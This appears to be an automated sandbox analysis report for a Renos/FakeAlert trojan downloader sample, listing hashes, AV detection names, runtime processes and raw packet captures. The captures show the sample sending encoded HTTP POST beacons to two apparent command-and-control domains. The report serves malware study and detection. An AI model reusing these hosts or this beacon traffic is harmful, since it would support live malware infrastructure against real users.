Analysis Date2018-05-04 22:18:02
MD5a9bb5d77d36aabee33f2416bda8fbcaa
SHA1d6ed297ac7c77f1f0ea06b3e00c55d1c155eb731

Static Details:

File typePE32 executable (GUI) Intel 80386, for MS Windows
PEhash
AVArcabit (arcavir)Gen:Variant.Renos.96
AVAuthentiumW32/FakeAlert.NZ.gen!Eldorado
AVGrisoft (avg)Generic23.CLJK
AVAvira (antivir)TR/Jorik.Skor.B.2
AVAlwil (avast)MalOb-GP [Cryp]
AVAd-AwareGen:Variant.Renos.96
AVBitDefenderGen:Variant.Renos.96
AVBullGuardGen:Variant.Renos.96
AVClamAVWin.Downloader.112898-1
AVDr. WebTrojan.DownLoader3.30368
AVEmsisoftGen:Variant.Renos.96
AVMicroWorld (escan)Gen:Variant.Renos.96
AVCA (E-Trust Ino)Gen:Variant.Renos.96
AVFortinetW32/Delf.AT!tr
AVFrisk (f-prot)W32/FakeAlert.NZ.gen!Eldorado
AVF-SecureGen:Variant.Renos.96
AVIkarusTrojan-Downloader.Win32.Renos
AVK7Trojan ( 002a35bc1 )
AVKasperskyTrojan-Downloader.Win32.CodecPack.sjt
AVMalwareBytesNo Virus
AVMcafeeDownloader-CEW.bi
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos
AVNANOError Scanning File
AVEset (nod32)Win32/TrojanDownloader.FakeAlert.BBT
AVPadvishMalware.Trojan.Downloader-112898
AVCAT (quickheal)Trojan.Renos.PG
AVRisingTrojan.DL.Win32.DelfCode.gjc
AV360 SafeNo Virus
AVSUPERAntiSpywareTrojan.Agent/Gen-FakeAlert
AVSymantecVirusDoctor!gen6
AVTrend MicroTROJ_ARTO.SMIA
AVTwisterTrojan.730C031500@120089.mg
AVVirusBlokAda (vba32)TScope.Malware-Cryptor.SB
AVWindows DefenderTrojanDownloader:Win32/Renos
AVZillya!Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\d6ed297ac7c77f1f0ea06b3e00c55d1c155eb731.exe

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f3f69 6e693d76 32324d7a   POST /?ini=v22Mz
0x00000010 (00016)   7a546754 39543157 57426776 41515446   zTgT9T1WWBgvAQTF
0x00000020 (00032)   72467450 75572f4a 5941384d 34316554   rFtPuW/JYA8M41eT
0x00000030 (00048)   434e394c 6b685857 464f4969 78485a7a   CN9LkhXWFOIixHZz
0x00000040 (00064)   6d716b56 31724849 51714d67 4d715637   mqkV1rHIQqMgMqV7
0x00000050 (00080)   4a684e4b 6769424d 46346341 486a7a66   JhNKgiBMF4cAHjzf
0x00000060 (00096)   6f325274 75665170 4b582f4e 2f747376   o2RtufQpKX/N/tsv
0x00000070 (00112)   7537726b 413d3d20 48545450 2f312e31   u7rkA== HTTP/1.1
0x00000080 (00128)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000090 (00144)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x000000a0 (00160)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x000000b0 (00176)   640d0a48 6f73743a 20726f6f 66746f70   d..Host: rooftop
0x000000c0 (00192)   6a616d2e 696e0d0a 55736572 2d416765   jam.in..User-Age
0x000000d0 (00208)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000e0 (00224)   2857696e 646f7773 204e5420 362e313b   (Windows NT 6.1;
0x000000f0 (00240)   20776765 7420332e 303b2072 763a352e    wget 3.0; rv:5.
0x00000100 (00256)   30292047 65636b6f 2f323031 30303130   0) Gecko/2010010
0x00000110 (00272)   31204669 7265666f 782f352e 300d0a43   1 Firefox/5.0..C
0x00000120 (00288)   6f6e7465 6e742d4c 656e6774 683a2031   ontent-Length: 1
0x00000130 (00304)   35370d0a 436f6e6e 65637469 6f6e3a20   57..Connection: 
0x00000140 (00320)   636c6f73 650d0a43 61636865 2d436f6e   close..Cache-Con
0x00000150 (00336)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000160 (00352)   0d0a6461 74613d71 5372547a 474c3052   ..data=qSrTzGL0R
0x00000170 (00368)   4d437944 6e59392b 784a4551 65356e4e   MCyDnY9+xJEQe5nN
0x00000180 (00384)   4c756e64 734d7166 64674247 7a556f4a   LundsMqfdgBGzUoJ
0x00000190 (00400)   30785654 552f447a 51574333 444c6258   0xVTU/DzQWC3DLbX
0x000001a0 (00416)   422f5566 45545431 6f364632 5a49624c   B/UfETT1o6F2ZIbL
0x000001b0 (00432)   4547564a 304e6856 5454374c 386e5936   EGVJ0NhVTT7L8nY6
0x000001c0 (00448)   4c50426f 722f2b4d 75682b2f 36323233   LPBor/+Muh+/6223
0x000001d0 (00464)   54583351 526d7755 72677073 50393669   TX3QRmwUrgpsP96i
0x000001e0 (00480)   704e725a 504d7851 38725a44 46476657   pNrZPMxQ8rZDFGfW
0x000001f0 (00496)   61547655 346e574f 6a344577 6a303d     aTvU4nWOj4Ewj0=

0x00000000 (00000)   504f5354 202f3f69 6e693d76 32324d7a   POST /?ini=v22Mz
0x00000010 (00016)   7a546754 39543157 57426776 41515446   zTgT9T1WWBgvAQTF
0x00000020 (00032)   72467450 75572f4a 5941384d 34316554   rFtPuW/JYA8M41eT
0x00000030 (00048)   434e394c 6b685857 464f4969 78485a7a   CN9LkhXWFOIixHZz
0x00000040 (00064)   6d716b56 31724849 51714d67 4d715637   mqkV1rHIQqMgMqV7
0x00000050 (00080)   4a684e4b 6769424d 46346341 486a7a66   JhNKgiBMF4cAHjzf
0x00000060 (00096)   6f325274 75665170 4b582f4e 2f747376   o2RtufQpKX/N/tsv
0x00000070 (00112)   7537726b 413d3d20 48545450 2f312e31   u7rkA== HTTP/1.1
0x00000080 (00128)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000090 (00144)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x000000a0 (00160)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x000000b0 (00176)   640d0a48 6f73743a 206a756d 70706163   d..Host: jumppac
0x000000c0 (00192)   6b2e696e 0d0a5573 65722d41 67656e74   k.in..User-Agent
0x000000d0 (00208)   3a204d6f 7a696c6c 612f352e 30202857   : Mozilla/5.0 (W
0x000000e0 (00224)   696e646f 7773204e 5420362e 313b2077   indows NT 6.1; w
0x000000f0 (00240)   67657420 332e303b 2072763a 352e3029   get 3.0; rv:5.0)
0x00000100 (00256)   20476563 6b6f2f32 30313030 31303120    Gecko/20100101 
0x00000110 (00272)   46697265 666f782f 352e300d 0a436f6e   Firefox/5.0..Con
0x00000120 (00288)   74656e74 2d4c656e 6774683a 20313537   tent-Length: 157
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000140 (00320)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x00000150 (00336)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000160 (00352)   64617461 3d715372 547a474c 30524d43   data=qSrTzGL0RMC
0x00000170 (00368)   79446e59 392b784a 45516535 6e4e4c75   yDnY9+xJEQe5nNLu
0x00000180 (00384)   6e64734d 71666467 42477a55 6f4a3078   ndsMqfdgBGzUoJ0x
0x00000190 (00400)   5654552f 447a5157 4333444c 6258422f   VTU/DzQWC3DLbXB/
0x000001a0 (00416)   55664554 54316f36 46325a49 624c4547   UfETT1o6F2ZIbLEG
0x000001b0 (00432)   564a304e 68565454 374c386e 59364c50   VJ0NhVTT7L8nY6LP
0x000001c0 (00448)   426f722f 2b4d7568 2b2f3632 32335458   Bor/+Muh+/6223TX
0x000001d0 (00464)   3351526d 77557267 70735039 3669704e   3QRmwUrgpsP96ipN
0x000001e0 (00480)   725a504d 78513872 5a444647 66576154   rZPMxQ8rZDFGfWaT
0x000001f0 (00496)   7655346e 574f6a34 45776a30 3d303d     vU4nWOj4Ewj0=0=


Strings